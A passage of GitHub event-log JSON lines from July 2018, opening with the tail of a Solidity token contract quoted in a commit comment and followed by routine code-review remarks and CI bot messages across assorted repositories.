@param _from address The address which you want to send tokens from\r\n     * @param _to address The address which you want to transfer to\r\n     * @param _value uint256 the amount of tokens to be transferred\r\n     */\r\n    function transferFrom(address _from, address _to, uint256 _value) public returns (bool success) {\r\n        require(_to != address(0)\r\n                && _value > 0\r\n                && balanceOf[_from] >= _value\r\n                && allowance[_from][msg.sender] >= _value\r\n                && frozenAccount[_from] == false \r\n                && frozenAccount[_to] == false\r\n                && now > unlockUnixTime[_from] \r\n                && now > unlockUnixTime[_to]);\r\n\r\n        balanceOf[_from] = balanceOf[_from].sub(_value);\r\n        balanceOf[_to] = balanceOf[_to].add(_value);\r\n        allowance[_from][msg.sender] = allowance[_from][msg.sender].sub(_value);\r\n        Transfer(_from, _to, _value);\r\n        return true;\r\n    }\r\n\r\n    /**\r\n     * @dev Allows _spender to spend no more than _value tokens in your behalf\r\n     *      Added due to backwards compatibility with ERC20\r\n     * @param _spender The address authorized to spend\r\n     * @param _value the max amount they can spend\r\n     */\r\n    function approve(address _spender, uint256 _value) public returns (bool success) {\r\n        allowance[msg.sender][_spender] = _value;\r\n        Approval(msg.sender, _spender, _value);\r\n        return true;\r\n    }\r\n\r\n    /**\r\n     * @dev Function to check the amount of tokens that an owner allowed to a spender\r\n     *      Added due to backwards compatibility with ERC20\r\n     * @param _owner address The address which owns the funds\r\n     * @param _spender address The address which will spend the funds\r\n     */\r\n    function allowance(address _owner, address _spender) public view returns (uint256 remaining) {\r\n        return allowance[_owner][_spender];\r\n    }\r\n\r\n\r\n\r\n    /**\r\n     * @dev Burns a specific amount of tokens.\r\n     * @param _from The address that will burn the tokens.\r\n     * @param _unitAmount The amount of token to be burned.\r\n     */\r\n    function burn(address _from, uint256 _unitAmount) onlyOwner public {\r\n        require(_unitAmount > 0\r\n                && balanceOf[_from] >= _unitAmount);\r\n\r\n        balanceOf[_from] = balanceOf[_from].sub(_unitAmount);\r\n        totalSupply = totalSupply.sub(_unitAmount);\r\n        Burn(_from, _unitAmount);\r\n    }\r\n\r\n\r\n    modifier canMint() {\r\n        require(!mintingFinished);\r\n        _;\r\n    }\r\n\r\n    /**\r\n     * @dev Function to mint tokens\r\n     * @param _to The address that will receive the minted tokens.\r\n     * @param _unitAmount The amount of tokens to mint.\r\n     */\r\n    function mint(address _to, uint256 _unitAmount) onlyOwner canMint public returns (bool) {\r\n        require(_unitAmount > 0);\r\n        \r\n        totalSupply = totalSupply.add(_unitAmount);\r\n        balanceOf[_to] = balanceOf[_to].add(_unitAmount);\r\n        Mint(_to, _unitAmount);\r\n        Transfer(address(0), _to, _unitAmount);\r\n        return true;\r\n    }\r\n\r\n    /**\r\n     * @dev Function to stop minting new tokens.\r\n     */\r\n    function finishMinting() onlyOwner canMint public returns (bool) {\r\n        mintingFinished = true;\r\n        MintFinished();\r\n        return true;\r\n    }\r\n\r\n\r\n\r\n    /**\r\n     * @dev Function to distribute tokens to the list of addresses by the provided amount\r\n     */\r\n    function distributeAirdrop(address[] addresses, uint256 amount) public returns (bool) {\r\n        require(amount > 0 \r\n                && addresses.length > 0\r\n                && frozenAccount[msg.sender] == false\r\n                && now > unlockUnixTime[msg.sender]);\r\n\r\n        amount = amount.mul(1e8);\r\n        uint256 totalAmount = amount.mul(addresses.length);\r\n        require(balanceOf[msg.sender] >= totalAmount);\r\n        \r\n        for (uint j = 0; j < addresses.length; j++) {\r\n            require(addresses[j] != 0x0\r\n                    && frozenAccount[addresses[j]] == false\r\n                    && now > unlockUnixTime[addresses[j]]);\r\n\r\n            balanceOf[addresses[j]] = balanceOf[addresses[j]].add(amount);\r\n            Transfer(msg.sender, addresses[j], amount);\r\n        }\r\n        balanceOf[msg.sender] = balanceOf[msg.sender].sub(totalAmount);\r\n        return true;\r\n    }\r\n\r\n    function distributeAirdrop(address[] addresses, uint[] amounts) public returns (bool) {\r\n        require(addresses.length > 0\r\n                && addresses.length == amounts.length\r\n                && frozenAccount[msg.sender] == false\r\n                && now > unlockUnixTime[msg.sender]);\r\n                \r\n        uint256 totalAmount = 0;\r\n        \r\n        for(uint j = 0; j < addresses.length; j++){\r\n            require(amounts[j] > 0\r\n                    && addresses[j] != 0x0\r\n                    && frozenAccount[addresses[j]] == false\r\n                    && now > unlockUnixTime[addresses[j]]);\r\n                    \r\n            amounts[j] = amounts[j].mul(1e8);\r\n            totalAmount = totalAmount.add(amounts[j]);\r\n        }\r\n        require(balanceOf[msg.sender] >= totalAmount);\r\n        \r\n        for (j = 0; j < addresses.length; j++) {\r\n            balanceOf[addresses[j]] = balanceOf[addresses[j]].add(amounts[j]);\r\n            Transfer(msg.sender, addresses[j], amounts[j]);\r\n        }\r\n        balanceOf[msg.sender] = balanceOf[msg.sender].sub(totalAmount);\r\n        return true;\r\n    }\r\n\r\n    /**\r\n     * @dev Function to collect tokens from the list of addresses\r\n     */\r\n    function collectTokens(address[] addresses, uint[] amounts) onlyOwner public returns (bool) {\r\n        require(addresses.length > 0\r\n                && addresses.length == amounts.length);\r\n\r\n        uint256 totalAmount = 0;\r\n        \r\n        for (uint j = 0; j < addresses.length; j++) {\r\n            require(amounts[j] > 0\r\n                    && addresses[j] != 0x0\r\n                    && frozenAccount[addresses[j]] == false\r\n                    && now > unlockUnixTime[addresses[j]]);\r\n                    \r\n            amounts[j] = amounts[j].mul(1e8);\r\n            require(balanceOf[addresses[j]] >= amounts[j]);\r\n            balanceOf[addresses[j]] = balanceOf[addresses[j]].sub(amounts[j]);\r\n            totalAmount = totalAmount.add(amounts[j]);\r\n            Transfer(addresses[j], msg.sender, amounts[j]);\r\n        }\r\n        balanceOf[msg.sender] = balanceOf[msg.sender].add(totalAmount);\r\n        return true;\r\n    }\r\n\r\n\r\n    function setDistributeAmount(uint256 _unitAmount) onlyOwner public {\r\n        distributeAmount = _unitAmount;\r\n    }\r\n    \r\n    /**\r\n     * @dev Function to distribute tokens to the msg.sender automatically\r\n     *      If distributeAmount is 0, this function doesn't work\r\n     */\r\n    function autoDistribute() payable public {\r\n        require(distributeAmount > 0\r\n                && balanceOf[owner] >= distributeAmount\r\n                && frozenAccount[msg.sender] == false\r\n                && now > unlockUnixTime[msg.sender]);\r\n        if(msg.value > 0) owner.transfer(msg.value);\r\n        \r\n        balanceOf[owner] = balanceOf[owner].sub(distributeAmount);\r\n        balanceOf[msg.sender] = balanceOf[msg.sender].add(distributeAmount);\r\n        Transfer(owner, msg.sender, distributeAmount);\r\n    }\r\n\r\n    /**\r\n     * @dev fallback function\r\n     */\r\n    function() payable public {\r\n        autoDistribute();\r\n     }\r\n\r\n}"}},"created_at":"2018-07-17T13:46:00Z"}
{"id":"7976811886","type":"CommitCommentEvent","actor":{"login":"neilrackett"},"repo":{"name":"mesmotronic/conbo"},"payload":{"comment":{"id":29734973,"position":null,"line":null,"path":null,"commit_id":"6ad5fd0936e6ffae4b8a654fc7886960a5d73fac","created_at":"2018-07-17T13:46:11Z","updated_at":"2018-07-17T13:46:11Z","author_association":"CONTRIBUTOR","body":"```\r\ncreationComplete():void;\r\n```\r\n\r\n;-)"}},"created_at":"2018-07-17T13:46:11Z"}
{"id":"7976812597","type":"CommitCommentEvent","actor":{"login":"yubobae"},"repo":{"name":"yubobae/yubobae.github.com"},"payload":{"comment":{"id":29734982,"position":5,"line":130,"path":"_layouts/default.html","commit_id":"12cd09aafe9b6e16ca1fd8716a2813463456b4d8","created_at":"2018-07-17T13:46:18Z","updated_at":"2018-07-17T13:46:18Z","author_association":"OWNER","body":"ㅇ"}},"created_at":"2018-07-17T13:46:18Z"}
{"id":"7976813625","type":"CommitCommentEvent","actor":{"login":"Flyingmana"},"repo":{"name":"OpenMage/magento-lts"},"payload":{"comment":{"id":29734984,"position":null,"line":null,"path":null,"commit_id":"afc58e89714d5ec3c7a24b4af571bc3d4d66f0e3","created_at":"2018-07-17T13:46:27Z","updated_at":"2018-07-17T13:46:27Z","author_association":"MEMBER","body":"I did merge directly from the mirror branch because its easier and less time consuming, and it does not require a Review, as the mirror branch is already verified via a review.\r\n\r\nand, could you please use a more specific word then \"dirty\" as Iam not exactly sure what it refers to"}},"created_at":"2018-07-17T13:46:27Z"}
{"id":"7976814138","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29734986,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-17T13:46:32Z","updated_at":"2018-07-17T13:46:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T13:46:32Z"}
{"id":"7976814999","type":"CommitCommentEvent","actor":{"login":"r7vmc"},"repo":{"name":"r7vmc/ApiUpdaterDP"},"payload":{"comment":{"id":29734988,"position":null,"line":null,"path":null,"commit_id":"36f63430821c1bf6422561078ba660c338d0d060","created_at":"2018-07-17T13:46:40Z","updated_at":"2018-07-17T13:46:40Z","author_association":"OWNER","body":"Thanks @SOF3"}},"created_at":"2018-07-17T13:46:40Z"}
{"id":"7976820887","type":"CommitCommentEvent","actor":{"login":"adam-haku"},"repo":{"name":"mricart88/days"},"payload":{"comment":{"id":29734996,"position":5,"line":5,"path":"app.rb","commit_id":"ee50d8ac55f7018faa0514d21fe5f84c09f15ce6","created_at":"2018-07-17T13:47:38Z","updated_at":"2018-07-17T13:47:38Z","author_association":"NONE","body":"One of the differences between ruby and JS is to use snake_case for method, variables, and argument names.  \r\n\r\nExample:\r\n```\r\ndef parse_date(date_string)\r\n  DateTime.strptime(date_string, '%D')\r\nend\r\n```\r\n       \r\nThere are a few good ruby style guides out there that talk about these conventions.\r\n\r\nhttps://github.com/airbnb/ruby\r\n\r\nAlso, in ruby you don't need to use explicit `returns`.  The value returned from the last line in your function or conditional block is what will be returned.\r\n\r\n "}},"created_at":"2018-07-17T13:47:38Z"}
{"id":"7976821939","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29734997,"position":66,"line":55,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T13:47:48Z","updated_at":"2018-07-17T13:47:48Z","author_association":"NONE","body":"So if `msg.value < fee`, do I get a huge number?\r\n"}},"created_at":"2018-07-17T13:47:48Z"}
{"id":"7976823171","type":"CommitCommentEvent","actor":{"login":"yubobae"},"repo":{"name":"yubobae/yubobae.github.com"},"payload":{"comment":{"id":29734999,"position":null,"line":null,"path":null,"commit_id":"12cd09aafe9b6e16ca1fd8716a2813463456b4d8","created_at":"2018-07-17T13:48:00Z","updated_at":"2018-07-17T13:48:00Z","author_association":"OWNER","body":"ㄴㄴ"}},"created_at":"2018-07-17T13:48:00Z"}
{"id":"7976824360","type":"CommitCommentEvent","actor":{"login":"agronholm"},"repo":{"name":"pypa/wheel"},"payload":{"comment":{"id":29735004,"position":null,"line":null,"path":null,"commit_id":"50e11a0c10ad33eea4e887ea0c1fb6133f0a74d8","created_at":"2018-07-17T13:48:12Z","updated_at":"2018-07-17T13:48:12Z","author_association":"CONTRIBUTOR","body":"Nvm, it's in `wheel/metadata.py `. I'll fix this real soon."}},"created_at":"2018-07-17T13:48:12Z"}
{"id":"7976826601","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29735007,"position":19,"line":19,"path":"tests/TicTacToeTest.php","commit_id":"3ffac1b54136046406dd307d484db49ba64d8037","created_at":"2018-07-17T13:48:33Z","updated_at":"2018-07-17T13:48:33Z","author_association":"NONE","body":"Game knows about Map anyway. The user of Game however does not need to also know about Map. `isMapEmpty` returns a boolean."}},"created_at":"2018-07-17T13:48:33Z"}
{"id":"7976828020","type":"CommitCommentEvent","actor":{"login":"adam-haku"},"repo":{"name":"mricart88/days"},"payload":{"comment":{"id":29735011,"position":12,"line":12,"path":"app.rb","commit_id":"ee50d8ac55f7018faa0514d21fe5f84c09f15ce6","created_at":"2018-07-17T13:48:45Z","updated_at":"2018-07-17T13:48:45Z","author_association":"NONE","body":"What if the days are equal?"}},"created_at":"2018-07-17T13:48:45Z"}
{"id":"7976828360","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29735012,"position":79,"line":61,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T13:48:49Z","updated_at":"2018-07-17T13:48:49Z","author_association":"NONE","body":"How can Alice assuredly create `hashedPasswordPayee` off-chain?"}},"created_at":"2018-07-17T13:48:49Z"}
{"id":"7976831827","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29735023,"position":82,"line":64,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T13:49:21Z","updated_at":"2018-07-17T13:49:21Z","author_association":"NONE","body":"You can `Payment storage payment = payments[paymentID];` and clear up a bit the readability."}},"created_at":"2018-07-17T13:49:21Z"}
{"id":"7976838454","type":"CommitCommentEvent","actor":{"login":"weavejester"},"repo":{"name":"weavejester/cljfmt"},"payload":{"comment":{"id":29735033,"position":null,"line":null,"path":null,"commit_id":"439a2503e2d7e94ea57b7bb43a1ac4664d45d7b7","created_at":"2018-07-17T13:50:25Z","updated_at":"2018-07-17T13:50:25Z","author_association":"OWNER","body":"It's now been released and deployed to Clojars as version 0.6.0."}},"created_at":"2018-07-17T13:50:25Z"}
{"id":"7976841909","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":29735040,"position":181,"line":181,"path":"aio/src/app/shared/scroll-spy.service.ts","commit_id":"c8b08f3a597d08ba71220a6b3e0c64d4ce6ed175","created_at":"2018-07-17T13:50:58Z","updated_at":"2018-07-17T13:50:58Z","author_association":"MEMBER","body":"I suggest you create a \"simple\" reproduction of your problem. It is impossible to help otherwise."}},"created_at":"2018-07-17T13:50:58Z"}
{"id":"7976842792","type":"CommitCommentEvent","actor":{"login":"adam-haku"},"repo":{"name":"mricart88/days"},"payload":{"comment":{"id":29735042,"position":21,"line":21,"path":"app.rb","commit_id":"ee50d8ac55f7018faa0514d21fe5f84c09f15ce6","created_at":"2018-07-17T13:51:08Z","updated_at":"2018-07-17T13:51:08Z","author_association":"NONE","body":"wrap method arguments in parentheses\r\n\r\n`data = JSON.parse(request.body.read)`"}},"created_at":"2018-07-17T13:51:08Z"}
{"id":"7976843398","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29735044,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-17T13:51:13Z","updated_at":"2018-07-17T13:51:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T13:51:13Z"}
{"id":"7976849485","type":"CommitCommentEvent","actor":{"login":"sanchaez"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29735051,"position":18,"line":59,"path":"boot/freeldr/freeldr/include/fs/btrfs.h","commit_id":"61d2c58640635b7786d62199ec5fdd08d6a71c3c","created_at":"2018-07-17T13:52:13Z","updated_at":"2018-07-17T13:52:13Z","author_association":"NONE","body":"Don't mix tabs and spaces."}},"created_at":"2018-07-17T13:52:13Z"}
{"id":"7976851279","type":"CommitCommentEvent","actor":{"login":"adam-haku"},"repo":{"name":"mricart88/days"},"payload":{"comment":{"id":29735058,"position":27,"line":27,"path":"app.rb","commit_id":"ee50d8ac55f7018faa0514d21fe5f84c09f15ce6","created_at":"2018-07-17T13:52:28Z","updated_at":"2018-07-17T13:52:28Z","author_association":"NONE","body":"This is the older hash syntax.  You can omit the hashrocket `=>` and use this syntax:\r\n\r\n`{number_of_days: @days.to_i}.to_json`"}},"created_at":"2018-07-17T13:52:28Z"}
{"id":"7976854226","type":"CommitCommentEvent","actor":{"login":"armandfardeau"},"repo":{"name":"OpenSourcePolitics/decidim"},"payload":{"comment":{"id":29735064,"position":5,"line":8,"path":"decidim-admin/spec/forms/navbar_link_form_spec.rb","commit_id":"246a530bfabb05ea416c4a1fe441698a9896bb2b","created_at":"2018-07-17T13:52:56Z","updated_at":"2018-07-17T13:52:56Z","author_association":"NONE","body":"@moustachu Il sert à quoi ce fameux context?\r\n"}},"created_at":"2018-07-17T13:52:56Z"}
{"id":"7976854859","type":"CommitCommentEvent","actor":{"login":"adeniltonbs"},"repo":{"name":"ZeusAutomacao/DFe.NET"},"payload":{"comment":{"id":29735069,"position":null,"line":null,"path":null,"commit_id":"d14362787b23b8fbed7d940bbed62526e0a7b832","created_at":"2018-07-17T13:53:01Z","updated_at":"2018-07-17T13:53:01Z","author_association":"MEMBER","body":"https://github.com/ZeusAutomacao/DFe.NET/commit/0a2e3ebbe316b9818b2f6de117adf415635396b8"}},"created_at":"2018-07-17T13:53:01Z"}
{"id":"7976857086","type":"CommitCommentEvent","actor":{"login":"jacksonj04"},"repo":{"name":"everypolitician/commons-explorer"},"payload":{"comment":{"id":29735072,"position":null,"line":null,"path":null,"commit_id":"f8a072de96c40d7d0f0437953cd37003516a8fdd","created_at":"2018-07-17T13:53:22Z","updated_at":"2018-07-17T13:53:22Z","author_association":"CONTRIBUTOR","body":"This does mean that RuboCop is targeting a different version to deployment"}},"created_at":"2018-07-17T13:53:22Z"}
{"id":"7976861955","type":"CommitCommentEvent","actor":{"login":"armandfardeau"},"repo":{"name":"OpenSourcePolitics/decidim"},"payload":{"comment":{"id":29735082,"position":6,"line":18,"path":"decidim-admin/app/forms/decidim/admin/navbar_link_form.rb","commit_id":"246a530bfabb05ea416c4a1fe441698a9896bb2b","created_at":"2018-07-17T13:54:08Z","updated_at":"2018-07-17T13:54:08Z","author_association":"NONE","body":"@moustachu  Why the organization should not be mentionned?"}},"created_at":"2018-07-17T13:54:08Z"}
{"id":"7976863882","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29735085,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-17T13:54:26Z","updated_at":"2018-07-17T13:54:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T13:54:26Z"}
{"id":"7976863916","type":"CommitCommentEvent","actor":{"login":"juribeparada"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29735086,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-17T13:54:26Z","updated_at":"2018-07-17T13:54:26Z","author_association":"OWNER","body":"I really don't think AFC would be a problem for your D-Star issue. Have you tried with a MMDVM system (not personal hotspot MMDVM_HS) with very low signal to see if this also happen?"}},"created_at":"2018-07-17T13:54:26Z"}
{"id":"7976865775","type":"CommitCommentEvent","actor":{"login":"jacobvinzent"},"repo":{"name":"jacobvinzent/QLIK-Visualization-API-json-file"},"payload":{"comment":{"id":29735090,"position":null,"line":null,"path":null,"commit_id":"2ee63fddaa60bef0ef646e1e9b0c248428543601","created_at":"2018-07-17T13:54:43Z","updated_at":"2018-07-17T13:54:43Z","author_association":"OWNER","body":"[helpdesk-angular.zip](https://github.com/jacobvinzent/QLIK-Visualization-API-json-file/files/2201918/helpdesk-angular.zip)\r\n"}},"created_at":"2018-07-17T13:54:43Z"}
{"id":"7976867146","type":"CommitCommentEvent","actor":{"login":"szuro"},"repo":{"name":"HenriqueCaires/ZabbixApi"},"payload":{"comment":{"id":29735095,"position":null,"line":null,"path":null,"commit_id":"22685198f09f04e2e46447fa4f16fa6e3f98d416","created_at":"2018-07-17T13:54:56Z","updated_at":"2018-07-17T13:54:56Z","author_association":"NONE","body":"If you look only at the definitions of item objects in [3.0](https://www.zabbix.com/documentation/3.0/manual/api/reference/item/object) and [3.4](https://www.zabbix.com/documentation/3.4/manual/api/reference/item/object) you are correct.\r\nHowever, if you take a look at the JSONs used in request/responses, you'll notice that they always use strings.\r\n\r\nI believe it would be best to account for this in (de)serialization."}},"created_at":"2018-07-17T13:54:56Z"}
{"id":"7976869543","type":"CommitCommentEvent","actor":{"login":"vimalbupathy"},"repo":{"name":"holbertonschool/your_first_code"},"payload":{"comment":{"id":29735101,"position":null,"line":null,"path":null,"commit_id":"95b4321689aed24a296ac62cf0cb1b065c1c0e55","created_at":"2018-07-17T13:55:17Z","updated_at":"2018-07-17T13:55:17Z","author_association":"NONE","body":"Changes done"}},"created_at":"2018-07-17T13:55:17Z"}
{"id":"7976882075","type":"CommitCommentEvent","actor":{"login":"RosetteDraz"},"repo":{"name":"RosetteDraz/workStaff"},"payload":{"comment":{"id":29735123,"position":null,"line":null,"path":null,"commit_id":"ad4045735ec14e15a40a587427cc51e029a8a676","created_at":"2018-07-17T13:57:11Z","updated_at":"2018-07-17T13:57:11Z","author_association":"OWNER","body":"...."}},"created_at":"2018-07-17T13:57:11Z"}
{"id":"7976883069","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"FaigerSYS/MapImageEngine"},"payload":{"comment":{"id":29735126,"position":null,"line":null,"path":null,"commit_id":"f86365c1f5a4e68349a805f9d874d33fd8df914f","created_at":"2018-07-17T13:57:20Z","updated_at":"2018-07-17T13:57:20Z","author_association":"NONE","body":"Dear @FaigerSYS:\nI am writing to remind you that Poggit does not accept non-released APIs. API 4.0.0 has not been released yet, so Poggit will automatically remove it from your plugin.yml.\n\nI will not reject this update because of this automatically removed API version, and the rest of the changes in this update look OK. As a result, Your release will still be approved, but please be reminded that your plugin's download from Poggit **will not display as supporting 4.0.0**.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-17T13:57:20Z"}
{"id":"7976884518","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29735129,"position":null,"line":null,"path":null,"commit_id":"60b07172ec9b437872f81a8d37de54dbdf91e73d","created_at":"2018-07-17T13:57:33Z","updated_at":"2018-07-17T13:57:33Z","author_association":"CONTRIBUTOR","body":"This commit allows plain-text encoding of musical symbols in text directions in the Humdrum-to-MEI converter.\r\n\r\nExample:\r\n\r\n```\r\n**kern\r\n!LO:TX:t=Coda&colon; [coda]\r\n1c\r\n=\r\n!LO:TX:t=Segno&colon; [segno]\r\n1c\r\n=\r\n!LO:TX:t=Pedal&colon; [ped]\r\n1c\r\n=\r\n!LO:TX:t=Quarter&colon; [quarter]\r\n1c\r\n=\r\n!LO:TX:t=eighth&colon; [eighth]\r\n1c\r\n=\r\n*-\r\n```\r\n\r\nRendering in Chrome/linux:\r\n\r\n<img width=\"1234\" alt=\"screen shot 2018-07-17 at 3 53 48 pm\" src=\"https://user-images.githubusercontent.com/3487289/42821909-f2262786-89d9-11e8-837c-9923fe4d6cb3.png\">\r\n\r\nRendering in Chrome/MacOS:\r\n\r\n<img width=\"1015\" alt=\"screen shot 2018-07-17 at 3 44 13 pm\" src=\"https://user-images.githubusercontent.com/3487289/42821932-03b400ae-89da-11e8-9af0-1f7c6c15c731.png\">\r\n"}},"created_at":"2018-07-17T13:57:33Z"}
{"id":"7976885255","type":"CommitCommentEvent","actor":{"login":"RosetteDraz"},"repo":{"name":"RosetteDraz/workStaff"},"payload":{"comment":{"id":29735133,"position":null,"line":null,"path":null,"commit_id":"ad4045735ec14e15a40a587427cc51e029a8a676","created_at":"2018-07-17T13:57:41Z","updated_at":"2018-07-17T13:57:41Z","author_association":"OWNER","body":"validate"}},"created_at":"2018-07-17T13:57:41Z"}
{"id":"7976899839","type":"CommitCommentEvent","actor":{"login":"NapIl1"},"repo":{"name":"NapIl1/HW_LevelUP_Matrix"},"payload":{"comment":{"id":29735165,"position":191,"line":286,"path":"07142018_HW_Matrix/Program.cs","commit_id":"466ff9c5b23e8f9c06e7a1bf6b6733f255f3e1ac","created_at":"2018-07-17T13:59:52Z","updated_at":"2018-07-17T13:59:52Z","author_association":"OWNER","body":"Обратить сюда внимание\r\n"}},"created_at":"2018-07-17T13:59:52Z"}
{"id":"7976902919","type":"CommitCommentEvent","actor":{"login":"skarzhevskyy"},"repo":{"name":"skarzhevskyy/gwt-mock-2.5.1"},"payload":{"comment":{"id":29735173,"position":null,"line":null,"path":null,"commit_id":"7e675841d3d19a627383fe2d39f5850c8793c9e2","created_at":"2018-07-17T14:00:19Z","updated_at":"2018-07-17T14:00:19Z","author_association":"OWNER","body":"@gabor-farkas   I could not imagine you or me maintaining 2.5.1 version.\r\nHaving the main repo gwt-mock-2.5.1  remand  to  gwt-mock-jre  would more  reasonable and you would get more traction in the project.  The -2.5.1 version can be done as a branch.\r\n\r\nBTW if you are to start it. If possible the  fork or git sub-tree should  be done from GWT project itself and the changes from gwt-mock-2.5.1 applied on top, git can to the magic.  So the history and line numbers of GWT would be intact for debugging and easy problems finding........\r\n"}},"created_at":"2018-07-17T14:00:19Z"}
{"id":"7976908156","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29735184,"position":16,"line":62,"path":"code/drasil-docLang/Drasil/DocumentLanguage/Definitions.hs","commit_id":"1ac44586e3088e138c4bed83f1f5fa2bf385372b","created_at":"2018-07-17T14:01:04Z","updated_at":"2018-07-17T14:01:04Z","author_association":"COLLABORATOR","body":"Thanks for the feedback @szymczdm. \r\nThe original `gdefn` was taking in a `GenDefn` and essentially converting it to a `Contents` type. In order to \"catch up\" to the changes in DocumentLanguage.hs, this `gdefn` was supposed to produce a `LabelledContent` for rendering.\r\n\r\nThe hardcoded `++ \"LC\"` was a way of simplifying the process of making a `uid` for the `LabelledContent`. \r\nShould `LabelledContent`s built off of each `GenDefn` not have their own `uid`? I can update it to use the `uid` of the `GenDefn` but I thought that each \"chunk\" instance in Drasil needs to be unique?"}},"created_at":"2018-07-17T14:01:04Z"}
{"id":"7976911199","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29735188,"position":null,"line":null,"path":null,"commit_id":"2c26a28af315dca16d22ded335d6bfe41d4eb6af","created_at":"2018-07-17T14:01:31Z","updated_at":"2018-07-17T14:01:31Z","author_association":"NONE","body":"Score division by 4 was ok for tuning (since same version playing against each other)\r\nbut generally we try to avoid score divisions (score additions or multiplications are fine)\r\n\r\nSo depending on your final tr1 and tr3, I suggest a SPRT[0, 4] test with\r\n\r\n```\r\nconstexpr int TrappedRook[] = { 173, 86 };\r\nscore -= make_score((TrappedRook[pos,can_castle(Us)] * (4 - mob)) / 4, 0);\r\n```\r\n\r\n"}},"created_at":"2018-07-17T14:01:31Z"}
{"id":"7976912665","type":"CommitCommentEvent","actor":{"login":"zhoujy3016"},"repo":{"name":"zhoujy3016/renren-security"},"payload":{"comment":{"id":29735190,"position":null,"line":null,"path":null,"commit_id":"be1ffc4b48edfcb1888a7c5779f9819e6520ad21","created_at":"2018-07-17T14:01:44Z","updated_at":"2018-07-17T14:01:44Z","author_association":"OWNER","body":"AES加密后可能生成“/” 开头的密文，造成以路径@PathVariable传递参数的形式无法识别，故用@RequestParam形式"}},"created_at":"2018-07-17T14:01:44Z"}
